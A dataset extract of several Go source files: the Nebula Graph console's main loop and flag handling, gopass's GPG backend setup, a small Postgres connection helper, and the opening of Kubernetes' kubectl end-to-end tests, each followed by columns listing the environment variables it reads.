fmt.Println()
fmt.Printf("Execution Plan (optimize time %d us)\n", res.GetPlanDesc().GetOptimizeTimeInUs())
fmt.Println()
planDescPrinter.PrintPlanDesc(res)
}
fmt.Println()
}
// Loop the request util fatal or timeout
// We treat one line as one query
// Add line break yourself as `SHOW \<CR>HOSTS`
func loop(session *nebula.Session, c cli.Cli) error {
for {
line, exit, err := c.ReadLine()
if err != nil {
return err
}
if exit { // Ctrl+D
fmt.Println()
return nil
}
if len(line) == 0 {
continue
}
// Console side command
if isLocal, cmd, args := isConsoleCmd(line); isLocal {
if cmd == Quit {
return nil
}
newSpace := executeConsoleCmd(cmd, args)
if newSpace != "" {
c.SetSpace(newSpace)
session.Execute(fmt.Sprintf("USE %s", newSpace))
if err != nil {
return err
}
}
continue
}
// Server side command
start := time.Now()
res, err := session.Execute(line)
if err != nil {
return err
}
if !res.IsSucceed() && !res.IsPartialSucceed() {
c.SetRespError(fmt.Sprintf("[ERROR (%d)]: %s", res.GetErrorCode(), res.GetErrorMsg()))
if c.IsPlayingData() {
break
}
}
duration := time.Since(start)
if c.Output() {
printResultSet(res, duration)
fmt.Println(time.Now().In(time.Local).Format(time.RFC1123))
fmt.Println()
}
c.SetSpace(res.GetSpaceName())
}
return nil
}
// Nebula Console version related
var (
gitCommit string
buildDate string
)
var (
address *string = flag.String("addr", "127.0.0.1", "The Nebula Graph IP/HOST address")
port *int = flag.Int("P", -1, "The Nebula Graph Port")
username *string = flag.String("u", "", "The Nebula Graph login user name")
password *string = flag.String("p", "", "The Nebula Graph login password")
timeout *int = flag.Int("t", 0, "The Nebula Graph client connection timeout in seconds, 0 means never timeout")
script *string = flag.String("e", "", "The nGQL directly")
file *string = flag.String("f", "", "The nGQL script file name")
version *bool = flag.Bool("v", false, "The Nebula Console version")
)
func init() {
flag.StringVar(address, "address", "127.0.0.1", "The Nebula Graph IP/HOST address")
flag.IntVar(port, "port", -1, "The Nebula Graph Port")
flag.StringVar(username, "user", "", "The Nebula Graph login user name")
flag.StringVar(password, "password", "", "The Nebula Graph login password")
flag.IntVar(timeout, "timeout", 0, "The Nebula Graph client connection timeout in seconds, 0 means never timeout")
flag.StringVar(script, "eval", "", "The nGQL directly")
flag.StringVar(file, "file", "", "The nGQL script file name")
flag.BoolVar(version, "version", false, "The Nebula Console version")
}
func validateFlags() {
if *port == -1 {
log.Panicf("Error: argument port is missed!")
}
if len(*username) == 0 {
log.Panicf("Error: username is empty!")
}
if len(*password) == 0 {
log.Panicf("Error: password is empty!")
}
}
var pool *nebula.ConnectionPool
func main() {
flag.Parse()
if flag.NFlag() == 1 && *version {
fmt.Printf("nebula-console version Git: %s, Build Time: %s\n", gitCommit, buildDate)
return
}
// Check if flags are valid
validateFlags()
interactive := *script == "" && *file == ""
historyHome := os.Getenv("HOME")
if historyHome == "" {
ex, err := os.Executable()
if err != nil {
log.Panicf("Get executable failed: %s", err.Error())
}
historyHome = filepath.Dir(ex) // Set to executable folder
}
hostAddress := nebula.HostAddress{Host: *address, Port: *port}
hostList := []nebula.HostAddress{hostAddress}
poolConfig := nebula.PoolConfig{
TimeOut: time.Duration(*timeout) * time.Millisecond,
IdleTime: 0 * time.Millisecond,
MaxConnPoolSize: 2,
MinConnPoolSize: 0,
}
var err error
pool, err = nebula.NewConnectionPool(hostList, poolConfig, nebula.DefaultLogger{})
if err != nil {
log.Panicf(fmt.Sprintf("Fail to initialize the connection pool, host: %s, port: %d, %s", *address, *port, err.Error()))
}
defer pool.Close()
session, err := pool.GetSession(*username, *password)
if err != nil {
log.Panicf("Fail to create a new session from connection pool, %s", err.Error())
}
defer session.Release()
welcome(interactive)
defer bye(*username, interactive)
var c cli.Cli = nil
// Loop the request
if interactive {
historyFile := path.Join(historyHome, ".nebula_history")
c = cli.NewiCli(historyFile, *username)
} else if *script != "" {
c = cli.NewnCli(strings.NewReader(*script), true, *username, nil)
} else if *file != "" {
fd, err := os.Open(*file)
if err != nil {
log.Panicf("Open file %s failed, %s", *file, err.Error())
}
c = cli.NewnCli(fd, true, *username, func() { fd.Close() })
}
if c == nil {
return
}
defer c.Close()
err = loop(session, c)
if err != nil {
log.Panicf("Loop error, %s", err.Error())
}
}
| [
"\"HOME\""
]
| []
| [
"HOME"
]
| [] | ["HOME"] | go | 1 | 0 | |
internal/backend/crypto/gpg/cli/gpg.go | // Package cli implements a GPG CLI crypto backend.
package cli
import (
"context"
"os"
"github.com/gopasspw/gopass/internal/backend/crypto/gpg"
"github.com/gopasspw/gopass/pkg/debug"
lru "github.com/hashicorp/golang-lru"
)
var (
// defaultArgs contains the default GPG args for non-interactive use. Note: Do not use '--batch'
// as this will disable (necessary) passphrase questions!
defaultArgs = []string{"--quiet", "--yes", "--compress-algo=none", "--no-encrypt-to", "--no-auto-check-trustdb"}
// Ext is the file extension used by this backend
Ext = "gpg"
// IDFile is the name of the recipients file used by this backend
IDFile = ".gpg-id"
)
// GPG is a gpg wrapper
type GPG struct {
binary string
args []string
pubKeys gpg.KeyList
privKeys gpg.KeyList
listCache *lru.TwoQueueCache
throwKids bool
}
// Config is the gpg wrapper config
type Config struct {
Binary string
Args []string
Umask int
}
// New creates a new GPG wrapper
func New(ctx context.Context, cfg Config) (*GPG, error) {
// ensure created files don't have group or world perms set
// this setting should be inherited by sub-processes
umask(cfg.Umask)
// make sure GPG_TTY is set (if possible)
if gt := os.Getenv("GPG_TTY"); gt == "" {
if t := tty(); t != "" {
_ = os.Setenv("GPG_TTY", t)
}
}
gcfg, err := gpgConfig()
if err != nil {
debug.Log("failed to read GPG config: %s", err)
}
_, throwKids := gcfg["throw-keyids"]
g := &GPG{
binary: "gpg",
args: append(defaultArgs, cfg.Args...),
throwKids: throwKids,
}
debug.Log("initializing LRU cache")
cache, err := lru.New2Q(1024)
if err != nil {
return nil, err
}
g.listCache = cache
debug.Log("LRU cache initialized")
debug.Log("detecting binary")
bin, err := Binary(ctx, cfg.Binary)
if err != nil {
return nil, err
}
g.binary = bin
debug.Log("binary detected")
return g, nil
}
// Initialized always returns nil
func (g *GPG) Initialized(ctx context.Context) error {
return nil
}
// Name returns gpg
func (g *GPG) Name() string {
return "gpg"
}
// Ext returns gpg
func (g *GPG) Ext() string {
return Ext
}
// IDFile returns .gpg-id
func (g *GPG) IDFile() string {
return IDFile
}
| [
"\"GPG_TTY\""
]
| []
| [
"GPG_TTY"
]
| [] | ["GPG_TTY"] | go | 1 | 0 | |
internal/pkg/db/db.go | package db
import (
"context"
"fmt"
"github.com/jackc/pgx/v4/pgxpool"
_ "github.com/jackc/pgx/v4/stdlib"
)
var Pool *pgxpool.Pool
func Db() (*pgxpool.Pool, error) {
fmt.Println("Connecting to DB...")
cs := "host='%v' user='%v' password='%v' dbname='%v'"
connectionString := fmt.Sprintf(cs,
"database",
"docker",
"docker",
"docker",
)
//pgxpool.ParseConfig(os.Getenv("DATABASE_URL"))
fmt.Printf("Using DB Connection String [%s] \n", connectionString)
var err error
Pool, err = pgxpool.Connect(context.Background(), connectionString)
if err != nil {
return nil, err
}
return Pool, nil
}
| [
"\"DATABASE_URL\""
]
| []
| [
"DATABASE_URL"
]
| [] | ["DATABASE_URL"] | go | 1 | 0 | |
test/e2e/kubectl/kubectl.go | /*
Copyright 2015 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// OWNER = sig/cli
package kubectl
import (
"bytes"
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"log"
"net"
"net/http"
"net/http/httptest"
"os"
"os/exec"
"path"
"path/filepath"
"regexp"
"sort"
"strconv"
"strings"
"text/template"
"time"
"github.com/elazarl/goproxy"
"github.com/ghodss/yaml"
"k8s.io/api/core/v1"
rbacv1beta1 "k8s.io/api/rbac/v1beta1"
apierrs "k8s.io/apimachinery/pkg/api/errors"
"k8s.io/apimachinery/pkg/api/resource"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/labels"
"k8s.io/apimachinery/pkg/runtime/schema"
utilnet "k8s.io/apimachinery/pkg/util/net"
"k8s.io/apimachinery/pkg/util/uuid"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/apiserver/pkg/authentication/serviceaccount"
genericregistry "k8s.io/apiserver/pkg/registry/generic/registry"
clientset "k8s.io/client-go/kubernetes"
"k8s.io/kubernetes/pkg/controller"
"k8s.io/kubernetes/test/e2e/framework"
"k8s.io/kubernetes/test/e2e/framework/testfiles"
"k8s.io/kubernetes/test/e2e/scheduling"
testutils "k8s.io/kubernetes/test/utils"
uexec "k8s.io/utils/exec"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"k8s.io/kubernetes/pkg/kubectl/polymorphichelpers"
imageutils "k8s.io/kubernetes/test/utils/image"
)
const (
updateDemoSelector = "name=update-demo"
guestbookStartupTimeout = 10 * time.Minute
guestbookResponseTimeout = 3 * time.Minute
simplePodSelector = "name=nginx"
simplePodName = "nginx"
nginxDefaultOutput = "Welcome to nginx!"
simplePodPort = 80
pausePodSelector = "name=pause"
pausePodName = "pause"
busyboxPodSelector = "app=busybox1"
busyboxPodName = "busybox1"
runJobTimeout = 5 * time.Minute
kubeCtlManifestPath = "test/e2e/testing-manifests/kubectl"
redisControllerFilename = "redis-master-controller.json.in"
redisServiceFilename = "redis-master-service.json"
nginxDeployment1Filename = "nginx-deployment1.yaml.in"
nginxDeployment2Filename = "nginx-deployment2.yaml.in"
nginxDeployment3Filename = "nginx-deployment3.yaml.in"
)
var (
nautilusImage = imageutils.GetE2EImage(imageutils.Nautilus)
kittenImage = imageutils.GetE2EImage(imageutils.Kitten)
redisImage = imageutils.GetE2EImage(imageutils.Redis)
nginxImage = imageutils.GetE2EImage(imageutils.Nginx)
busyboxImage = imageutils.GetE2EImage(imageutils.BusyBox)
)
var testImages = struct {
GBFrontendImage string
PauseImage string
NginxImage string
NginxNewImage string
RedisImage string
GBRedisSlaveImage string
NautilusImage string
KittenImage string
}{
imageutils.GetE2EImage(imageutils.GBFrontend),
imageutils.GetE2EImage(imageutils.Pause),
imageutils.GetE2EImage(imageutils.Nginx),
imageutils.GetE2EImage(imageutils.NginxNew),
imageutils.GetE2EImage(imageutils.Redis),
imageutils.GetE2EImage(imageutils.GBRedisSlave),
imageutils.GetE2EImage(imageutils.Nautilus),
imageutils.GetE2EImage(imageutils.Kitten),
}
var (
proxyRegexp = regexp.MustCompile("Starting to serve on 127.0.0.1:([0-9]+)")
CronJobGroupVersionResourceAlpha = schema.GroupVersionResource{Group: "batch", Version: "v2alpha1", Resource: "cronjobs"}
CronJobGroupVersionResourceBeta = schema.GroupVersionResource{Group: "batch", Version: "v1beta1", Resource: "cronjobs"}
)
// Stops everything from filePath from namespace ns and checks if everything matching selectors from the given namespace is correctly stopped.
// Aware of the kubectl example files map.
func cleanupKubectlInputs(fileContents string, ns string, selectors ...string) {
By("using delete to clean up resources")
var nsArg string
if ns != "" {
nsArg = fmt.Sprintf("--namespace=%s", ns)
}
// support backward compatibility : file paths or raw json - since we are removing file path
// dependencies from this test.
framework.RunKubectlOrDieInput(fileContents, "delete", "--grace-period=0", "--force", "-f", "-", nsArg)
framework.AssertCleanup(ns, selectors...)
}
func substituteImageName(content string) string {
contentWithImageName := new(bytes.Buffer)
tmpl, err := template.New("imagemanifest").Parse(content)
if err != nil {
framework.Failf("Failed Parse the template: %v", err)
}
err = tmpl.Execute(contentWithImageName, testImages)
if err != nil {
framework.Failf("Failed executing template: %v", err)
}
return contentWithImageName.String()
}
func readTestFileOrDie(file string) []byte {
return testfiles.ReadOrDie(path.Join(kubeCtlManifestPath, file), Fail)
}
func runKubectlRetryOrDie(args ...string) string {
var err error
var output string
for i := 0; i < 5; i++ {
output, err = framework.RunKubectl(args...)
if err == nil || (!strings.Contains(err.Error(), genericregistry.OptimisticLockErrorMsg) && !strings.Contains(err.Error(), "Operation cannot be fulfilled")) {
break
}
time.Sleep(time.Second)
}
// Expect no errors to be present after retries are finished
// Copied from framework #ExecOrDie
framework.Logf("stdout: %q", output)
Expect(err).NotTo(HaveOccurred())
return output
}
// duplicated setup to avoid polluting "normal" clients with alpha features which confuses the generated clients
var _ = SIGDescribe("Kubectl alpha client", func() {
defer GinkgoRecover()
f := framework.NewDefaultFramework("kubectl")
var c clientset.Interface
var ns string
BeforeEach(func() {
c = f.ClientSet
ns = f.Namespace.Name
})
framework.KubeDescribe("Kubectl run CronJob", func() {
var nsFlag string
var cjName string
BeforeEach(func() {
nsFlag = fmt.Sprintf("--namespace=%v", ns)
cjName = "e2e-test-echo-cronjob-alpha"
})
AfterEach(func() {
framework.RunKubectlOrDie("delete", "cronjobs", cjName, nsFlag)
})
It("should create a CronJob", func() {
framework.SkipIfMissingResource(f.DynamicClient, CronJobGroupVersionResourceAlpha, f.Namespace.Name)
schedule := "*/5 * * * ?"
framework.RunKubectlOrDie("run", cjName, "--restart=OnFailure", "--generator=cronjob/v2alpha1",
"--schedule="+schedule, "--image="+busyboxImage, nsFlag)
By("verifying the CronJob " + cjName + " was created")
sj, err := c.BatchV1beta1().CronJobs(ns).Get(cjName, metav1.GetOptions{})
if err != nil {
framework.Failf("Failed getting CronJob %s: %v", cjName, err)
}
if sj.Spec.Schedule != schedule {
framework.Failf("Failed creating a CronJob with correct schedule %s", schedule)
}
containers := sj.Spec.JobTemplate.Spec.Template.Spec.Containers
if checkContainersImage(containers, busyboxImage) {
framework.Failf("Failed creating CronJob %s for 1 pod with expected image %s: %#v", cjName, busyboxImage, containers)
}
if sj.Spec.JobTemplate.Spec.Template.Spec.RestartPolicy != v1.RestartPolicyOnFailure {
framework.Failf("Failed creating a CronJob with correct restart policy for --restart=OnFailure")
}
})
})
})
var _ = SIGDescribe("Kubectl client", func() {
defer GinkgoRecover()
f := framework.NewDefaultFramework("kubectl")
// Reusable cluster state function. This won't be adversely affected by lazy initialization of framework.
clusterState := func() *framework.ClusterVerification {
return f.NewClusterVerification(
f.Namespace,
framework.PodStateVerification{
Selectors: map[string]string{"app": "redis"},
ValidPhases: []v1.PodPhase{v1.PodRunning /*v1.PodPending*/},
})
}
forEachPod := func(podFunc func(p v1.Pod)) {
clusterState().ForEach(podFunc)
}
var c clientset.Interface
var ns string
BeforeEach(func() {
c = f.ClientSet
ns = f.Namespace.Name
})
// Customized Wait / ForEach wrapper for this test. These demonstrate the
// idiomatic way to wrap the ClusterVerification structs for syntactic sugar in large
// test files.
// Print debug info if atLeast Pods are not found before the timeout
waitForOrFailWithDebug := func(atLeast int) {
pods, err := clusterState().WaitFor(atLeast, framework.PodStartTimeout)
if err != nil || len(pods) < atLeast {
// TODO: Generalize integrating debug info into these tests so we always get debug info when we need it
framework.DumpAllNamespaceInfo(f.ClientSet, ns)
framework.Failf("Verified %d of %d pods , error: %v", len(pods), atLeast, err)
}
}
debugDiscovery := func() {
home := os.Getenv("HOME")
if len(home) == 0 {
framework.Logf("no $HOME envvar set")
return
}
cacheDir := filepath.Join(home, ".kube", "cache", "discovery")
err := filepath.Walk(cacheDir, func(path string, info os.FileInfo, err error) error {
if err != nil {
return err
}
// only pay attention to $host_$port/v1/serverresources.json files
subpath := strings.TrimPrefix(path, cacheDir+string(filepath.Separator))
parts := filepath.SplitList(subpath)
if len(parts) != 3 || parts[1] != "v1" || parts[2] != "serverresources.json" {
return nil
}
framework.Logf("%s modified at %s (current time: %s)", path, info.ModTime(), time.Now())
data, readError := ioutil.ReadFile(path)
if readError != nil {
framework.Logf("%s error: %v", path, readError)
} else {
framework.Logf("%s content: %s", path, string(data))
}
return nil
})
framework.Logf("scanned %s for discovery docs: %v", home, err)
}
framework.KubeDescribe("Update Demo", func() {
var nautilus, kitten string
BeforeEach(func() {
updateDemoRoot := "test/fixtures/doc-yaml/user-guide/update-demo"
nautilus = substituteImageName(string(testfiles.ReadOrDie(filepath.Join(updateDemoRoot, "nautilus-rc.yaml.in"), Fail)))
kitten = substituteImageName(string(testfiles.ReadOrDie(filepath.Join(updateDemoRoot, "kitten-rc.yaml.in"), Fail)))
})
/*
Release : v1.9
Testname: Kubectl, replication controller
Description: Create a Pod and a container with a given image. Configure replication controller to run 2 replicas. The number of running instances of the Pod MUST equal the number of replicas set on the replication controller which is 2.
*/
framework.ConformanceIt("should create and stop a replication controller ", func() {
defer cleanupKubectlInputs(nautilus, ns, updateDemoSelector)
By("creating a replication controller")
framework.RunKubectlOrDieInput(nautilus, "create", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, nautilusImage, 2, "update-demo", updateDemoSelector, getUDData("nautilus.jpg", ns), ns)
})
/*
Release : v1.9
Testname: Kubectl, scale replication controller
Description: Create a Pod and a container with a given image. Configure replication controller to run 2 replicas. The number of running instances of the Pod MUST equal the number of replicas set on the replication controller which is 2. Update the replicaset to 1. Number of running instances of the Pod MUST be 1. Update the replicaset to 2. Number of running instances of the Pod MUST be 2.
*/
framework.ConformanceIt("should scale a replication controller ", func() {
defer cleanupKubectlInputs(nautilus, ns, updateDemoSelector)
By("creating a replication controller")
framework.RunKubectlOrDieInput(nautilus, "create", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, nautilusImage, 2, "update-demo", updateDemoSelector, getUDData("nautilus.jpg", ns), ns)
By("scaling down the replication controller")
debugDiscovery()
framework.RunKubectlOrDie("scale", "rc", "update-demo-nautilus", "--replicas=1", "--timeout=5m", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, nautilusImage, 1, "update-demo", updateDemoSelector, getUDData("nautilus.jpg", ns), ns)
By("scaling up the replication controller")
debugDiscovery()
framework.RunKubectlOrDie("scale", "rc", "update-demo-nautilus", "--replicas=2", "--timeout=5m", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, nautilusImage, 2, "update-demo", updateDemoSelector, getUDData("nautilus.jpg", ns), ns)
})
/*
Release : v1.9
Testname: Kubectl, rolling update replication controller
Description: Create a Pod and a container with a given image. Configure replication controller to run 2 replicas. The number of running instances of the Pod MUST equal the number of replicas set on the replication controller which is 2. Run a rolling update to run a different version of the container. All running instances SHOULD now be running the newer version of the container as part of the rolling update.
*/
framework.ConformanceIt("should do a rolling update of a replication controller ", func() {
By("creating the initial replication controller")
framework.RunKubectlOrDieInput(string(nautilus[:]), "create", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, nautilusImage, 2, "update-demo", updateDemoSelector, getUDData("nautilus.jpg", ns), ns)
By("rolling-update to new replication controller")
debugDiscovery()
framework.RunKubectlOrDieInput(string(kitten[:]), "rolling-update", "update-demo-nautilus", "--update-period=1s", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
framework.ValidateController(c, kittenImage, 2, "update-demo", updateDemoSelector, getUDData("kitten.jpg", ns), ns)
// Everything will hopefully be cleaned up when the namespace is deleted.
})
})
framework.KubeDescribe("Guestbook application", func() {
forEachGBFile := func(run func(s string)) {
guestbookRoot := "test/e2e/testing-manifests/guestbook"
for _, gbAppFile := range []string{
"redis-slave-service.yaml",
"redis-master-service.yaml",
"frontend-service.yaml",
"frontend-deployment.yaml.in",
"redis-master-deployment.yaml.in",
"redis-slave-deployment.yaml.in",
} {
contents := substituteImageName(string(testfiles.ReadOrDie(filepath.Join(guestbookRoot, gbAppFile), Fail)))
run(contents)
}
}
/*
Release : v1.9
Testname: Kubectl, guestbook application
Description: Create Guestbook application that contains redis server, 2 instances of redis slave, frontend application, frontend service and redis master service and redis slave service. Using frontend service, the test will write an entry into the guestbook application which will store the entry into the backend redis database. Application flow MUST work as expected and the data written MUST be available to read.
*/
framework.ConformanceIt("should create and stop a working application ", func() {
defer forEachGBFile(func(contents string) {
cleanupKubectlInputs(contents, ns)
})
By("creating all guestbook components")
forEachGBFile(func(contents string) {
framework.Logf(contents)
framework.RunKubectlOrDieInput(contents, "create", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
})
By("validating guestbook app")
validateGuestbookApp(c, ns)
})
})
framework.KubeDescribe("Simple pod", func() {
var podYaml string
BeforeEach(func() {
By(fmt.Sprintf("creating the pod from %v", podYaml))
podYaml = substituteImageName(string(readTestFileOrDie("pod-with-readiness-probe.yaml.in")))
framework.RunKubectlOrDieInput(podYaml, "create", "-f", "-", fmt.Sprintf("--namespace=%v", ns))
Expect(framework.CheckPodsRunningReady(c, ns, []string{simplePodName}, framework.PodStartTimeout)).To(BeTrue())
})
AfterEach(func() {
cleanupKubectlInputs(podYaml, ns, simplePodSelector)
})
It("should support exec", func() {
By("executing a command in the container")
execOutput := framework.RunKubectlOrDie("exec", fmt.Sprintf("--namespace=%v", ns), simplePodName, "echo", "running", "in", "container")
if e, a := "running in container", strings.TrimSpace(execOutput); e != a {
framework.Failf("Unexpected kubectl exec output. Wanted %q, got %q", e, a)
}
By("executing a very long command in the container")
veryLongData := make([]rune, 20000)
for i := 0; i < len(veryLongData); i++ {
veryLongData[i] = 'a'
}
execOutput = framework.RunKubectlOrDie("exec", fmt.Sprintf("--namespace=%v", ns), simplePodName, "echo", string(veryLongData))
Expect(string(veryLongData)).To(Equal(strings.TrimSpace(execOutput)), "Unexpected kubectl exec output")
By("executing a command in the container with noninteractive stdin")
execOutput = framework.NewKubectlCommand("exec", fmt.Sprintf("--namespace=%v", ns), "-i", simplePodName, "cat").
WithStdinData("abcd1234").
ExecOrDie()
if e, a := "abcd1234", execOutput; e != a {
framework.Failf("Unexpected kubectl exec output. Wanted %q, got %q", e, a)
}
// pretend that we're a user in an interactive shell
r, closer, err := newBlockingReader("echo hi\nexit\n")
if err != nil {
framework.Failf("Error creating blocking reader: %v", err)
}
// NOTE this is solely for test cleanup!
defer closer.Close()
By("executing a command in the container with pseudo-interactive stdin")
execOutput = framework.NewKubectlCommand("exec", fmt.Sprintf("--namespace=%v", ns), "-i", simplePodName, "sh").
WithStdinReader(r).
ExecOrDie()
if e, a := "hi", strings.TrimSpace(execOutput); e != a {
framework.Failf("Unexpected kubectl exec output. Wanted %q, got %q", e, a)
}
})
It("should support exec through an HTTP proxy", func() {
// Fail if the variable isn't set
if framework.TestContext.Host == "" {
framework.Failf("--host variable must be set to the full URI to the api server on e2e run.")
}
By("Starting goproxy")
testSrv, proxyLogs := startLocalProxy()
defer testSrv.Close()
proxyAddr := testSrv.URL
for _, proxyVar := range []string{"https_proxy", "HTTPS_PROXY"} {
proxyLogs.Reset()
By("Running kubectl via an HTTP proxy using " + proxyVar)
output := framework.NewKubectlCommand(fmt.Sprintf("--namespace=%s", ns), "exec", "nginx", "echo", "running", "in", "container").
WithEnv(append(os.Environ(), fmt.Sprintf("%s=%s", proxyVar, proxyAddr))).
ExecOrDie()
// Verify we got the normal output captured by the exec server
expectedExecOutput := "running in container\n"
if output != expectedExecOutput {
framework.Failf("Unexpected kubectl exec output. Wanted %q, got %q", expectedExecOutput, output)
}
// Verify the proxy server logs saw the connection
expectedProxyLog := fmt.Sprintf("Accepting CONNECT to %s", strings.TrimSuffix(strings.TrimPrefix(framework.TestContext.Host, "https://"), "/api"))
proxyLog := proxyLogs.String()
if !strings.Contains(proxyLog, expectedProxyLog) {
framework.Failf("Missing expected log result on proxy server for %s. Expected: %q, got %q", proxyVar, expectedProxyLog, proxyLog)
}
}
})
It("should support exec through kubectl proxy", func() {
// Fail if the variable isn't set
if framework.TestContext.Host == "" {
framework.Failf("--host variable must be set to the full URI to the api server on e2e run.")
}
By("Starting kubectl proxy")
port, proxyCmd, err := startProxyServer()
framework.ExpectNoError(err)
defer framework.TryKill(proxyCmd)
//proxyLogs.Reset()
host := fmt.Sprintf("--server=http://127.0.0.1:%d", port)
By("Running kubectl via kubectl proxy using " + host)
output := framework.NewKubectlCommand(
host, fmt.Sprintf("--namespace=%s", ns),
"exec", "nginx", "echo", "running", "in", "container",
).ExecOrDie()
// Verify we got the normal output captured by the exec server
expectedExecOutput := "running in container\n"
if output != expectedExecOutput {
framework.Failf("Unexpected kubectl exec output. Wanted %q, got %q", expectedExecOutput, output)
}
})
It("should return command exit codes", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("execing into a container with a successful command")
_, err := framework.NewKubectlCommand(nsFlag, "exec", "nginx", "--", "/bin/sh", "-c", "exit 0").Exec()
framework.ExpectNoError(err)
By("execing into a container with a failing command")
_, err = framework.NewKubectlCommand(nsFlag, "exec", "nginx", "--", "/bin/sh", "-c", "exit 42").Exec()
ee, ok := err.(uexec.ExitError)
Expect(ok).To(Equal(true))
Expect(ee.ExitStatus()).To(Equal(42))
By("running a successful command")
_, err = framework.NewKubectlCommand(nsFlag, "run", "-i", "--image="+busyboxImage, "--restart=Never", "success", "--", "/bin/sh", "-c", "exit 0").Exec()
framework.ExpectNoError(err)
By("running a failing command")
_, err = framework.NewKubectlCommand(nsFlag, "run", "-i", "--image="+busyboxImage, "--restart=Never", "failure-1", "--", "/bin/sh", "-c", "exit 42").Exec()
ee, ok = err.(uexec.ExitError)
Expect(ok).To(Equal(true))
Expect(ee.ExitStatus()).To(Equal(42))
By("running a failing command without --restart=Never")
_, err = framework.NewKubectlCommand(nsFlag, "run", "-i", "--image="+busyboxImage, "--restart=OnFailure", "failure-2", "--", "/bin/sh", "-c", "cat && exit 42").
WithStdinData("abcd1234").
Exec()
framework.ExpectNoError(err)
By("running a failing command without --restart=Never, but with --rm")
_, err = framework.NewKubectlCommand(nsFlag, "run", "-i", "--image="+busyboxImage, "--restart=OnFailure", "--rm", "failure-3", "--", "/bin/sh", "-c", "cat && exit 42").
WithStdinData("abcd1234").
Exec()
framework.ExpectNoError(err)
framework.WaitForPodToDisappear(f.ClientSet, ns, "failure-3", labels.Everything(), 2*time.Second, wait.ForeverTestTimeout)
By("running a failing command with --leave-stdin-open")
_, err = framework.NewKubectlCommand(nsFlag, "run", "-i", "--image="+busyboxImage, "--restart=Never", "failure-4", "--leave-stdin-open", "--", "/bin/sh", "-c", "exit 42").
WithStdinData("abcd1234").
Exec()
framework.ExpectNoError(err)
})
It("should support inline execution and attach", func() {
nsFlag := fmt.Sprintf("--namespace=%v", ns)
By("executing a command with run and attach with stdin")
runOutput := framework.NewKubectlCommand(nsFlag, "run", "run-test", "--image="+busyboxImage, "--restart=OnFailure", "--attach=true", "--stdin", "--", "sh", "-c", "cat && echo 'stdin closed'").
WithStdinData("abcd1234").
ExecOrDie()
Expect(runOutput).To(ContainSubstring("abcd1234"))
Expect(runOutput).To(ContainSubstring("stdin closed"))
Expect(c.BatchV1().Jobs(ns).Delete("run-test", nil)).To(BeNil())
By("executing a command with run and attach without stdin")
runOutput = framework.NewKubectlCommand(fmt.Sprintf("--namespace=%v", ns), "run", "run-test-2", "--image="+busyboxImage, "--restart=OnFailure", "--attach=true", "--leave-stdin-open=true", "--", "sh", "-c", "cat && echo 'stdin closed'").
WithStdinData("abcd1234").
ExecOrDie()
Expect(runOutput).ToNot(ContainSubstring("abcd1234"))
Expect(runOutput).To(ContainSubstring("stdin closed"))
Expect(c.BatchV1().Jobs(ns).Delete("run-test-2", nil)).To(BeNil())
By("executing a command with run and attach with stdin with open stdin should remain running")
runOutput = framework.NewKubectlCommand(nsFlag, "run", "run-test-3", "--image="+busyboxImage, "--restart=OnFailure", "--attach=true", "--leave-stdin-open=true", "--stdin", "--", "sh", "-c", "cat && echo 'stdin closed'").
WithStdinData("abcd1234\n").
ExecOrDie()
Expect(runOutput).ToNot(ContainSubstring("stdin closed"))
g := func(pods []*v1.Pod) sort.Interface { return sort.Reverse(controller.ActivePods(pods)) }
runTestPod, _, err := polymorphichelpers.GetFirstPod(f.ClientSet.CoreV1(), ns, "run=run-test-3", 1*time.Minute, g)
if err != nil {
os.Exit(1)
}
if !framework.CheckPodsRunningReady(c, ns, []string{runTestPod.Name}, time.Minute) {
framework.Failf("Pod %q of Job %q should still be running", runTestPod.Name, "run-test-3")
}
// NOTE: we cannot guarantee our output showed up in the container logs before stdin was closed, so we have
// to loop test.
err = wait.PollImmediate(time.Second, time.Minute, func() (bool, error) {
if !framework.CheckPodsRunningReady(c, ns, []string{runTestPod.Name}, 1*time.Second) {
framework.Failf("Pod %q of Job %q should still be running", runTestPod.Name, "run-test-3")
}
logOutput := framework.RunKubectlOrDie(nsFlag, "logs", runTestPod.Name)
Expect(logOutput).ToNot(ContainSubstring("stdin closed"))
return strings.Contains(logOutput, "abcd1234"), nil
})
if err != nil {
os.Exit(1)
}
Expect(err).To(BeNil())
Expect(c.BatchV1().Jobs(ns).Delete("run-test-3", nil)).To(BeNil())
})
It("should support port-forward", func() {
By("forwarding the container port to a local port")
cmd := runPortForward(ns, simplePodName, simplePodPort)
defer cmd.Stop()
By("curling local port output")
localAddr := fmt.Sprintf("http://localhost:%d", cmd.port)
body, err := curl(localAddr)
framework.Logf("got: %s", body)
if err != nil {
framework.Failf("Failed http.Get of forwarded port (%s): %v", localAddr, err)
}
if !strings.Contains(body, nginxDefaultOutput) {
framework.Failf("Container port output missing expected value. Wanted:'%s', got: %s", nginxDefaultOutput, body)
}
})
It("should handle in-cluster config", func() {
By("adding rbac permissions")
// grant the view permission widely to allow inspection of the `invalid` namespace and the default namespace
framework.BindClusterRole(f.ClientSet.RbacV1beta1(), "view", f.Namespace.Name,
rbacv1beta1.Subject{Kind: rbacv1beta1.ServiceAccountKind, Namespace: f.Namespace.Name, Name: "default"})
err := framework.WaitForAuthorizationUpdate(f.ClientSet.AuthorizationV1beta1(),
serviceaccount.MakeUsername(f.Namespace.Name, "default"),
